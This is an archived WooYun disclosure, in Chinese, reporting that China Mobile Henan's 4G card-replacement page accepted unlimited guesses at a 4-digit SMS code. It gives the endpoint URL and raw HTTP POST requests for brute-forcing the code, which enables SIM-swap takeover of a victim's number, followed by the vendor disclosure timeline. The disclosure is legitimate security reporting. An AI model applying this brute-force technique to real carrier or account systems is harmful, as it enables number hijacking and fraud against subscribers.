乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-29: 细节已通知厂商并且等待厂商处理中 2015-02-02: 厂商已经确认,细节仅向厂商公开 2015-02-12: 细节向核心白帽子及相关领域专家公开 2015-02-22: 细节向普通白帽子公开 2015-03-04: 细节向实习白帽子公开 2015-03-15: 细节向公众公开
中国某省移动4G自助升级页面存在弱动态密码(可能导致补卡攻击)
河南移动商城4G换卡
http://ha.10086.cn/mshop/phonenum/v6phonenum!changeCardByValidateCode.action
微信中或手机浏览器访问
中国移动河南10086微信
免费换4G输入手机号抓包如下可以无限哦而且验证码是4位的可以爆破
POST /mshop/phonenum/v6phonenum!changeCardByValidateCode.action HTTP/1.1Accept-Language: zh-CNAccept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7Referer: http://ha.10086.cn/mshop/phonenum/v6phonenum!cardchange.actionUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; zh-cn; GT-I9100 Build/JZO54K) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025410 Mobile Safari/533.1 MicroMessenger/6.1.0.56_r1021013.540 NetType/WIFIOrigin: http://ha.10086.cnAccept: application/vnd.wap.xhtml+xml, text/vnd.wap.wml, application/xhtml+xml, text/html, image/png, image/jpeg, image/gif, */*;q=0.1Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipProxy-Connection: keep-aliveHost: ha.10086.cnCookie: xXXXXXContent-Length: 69mealId=4437606&payType=2&special4g=1&phoneNo=手机号码&messageCode=
输入一个验证码试试
抓包爆破
POST /mshop/phonenum/v6phonenum!changeCardByValidateCode.action HTTP/1.1Accept-Language: zh-CNAccept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7Referer: http://ha.10086.cn/mshop/phonenum/v6phonenum!changeCardByValidateCode.actionUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; zh-cn; GT-I9100 Build/JZO54K) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025410 Mobile Safari/533.1 MicroMessenger/6.1.0.56_r1021013.540 NetType/WIFIOrigin: http://ha.10086.cnAccept: application/vnd.wap.xhtml+xml, text/vnd.wap.wml, application/xhtml+xml, text/html, image/png, image/jpeg, image/gif, */*;q=0.1Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipProxy-Connection: keep-aliveHost: ha.10086.cnCookie: XXXXXXContent-Length: 73mealId=4437606&payType=2&special4g=1&phoneNo=XXXXX&messageCode=5555
跑出验证码是4444
(PS 这个显示验证码不正确是输入5555时出现的错误)然后点击我要立即换卡订单填写
而且还可以查看订单这里不演示了
危害等级:高
漏洞Rank:13
确认时间:2015-02-02 13:38
CNVD确认所述情况,已经转由CNCERT向中国移动通报。
暂无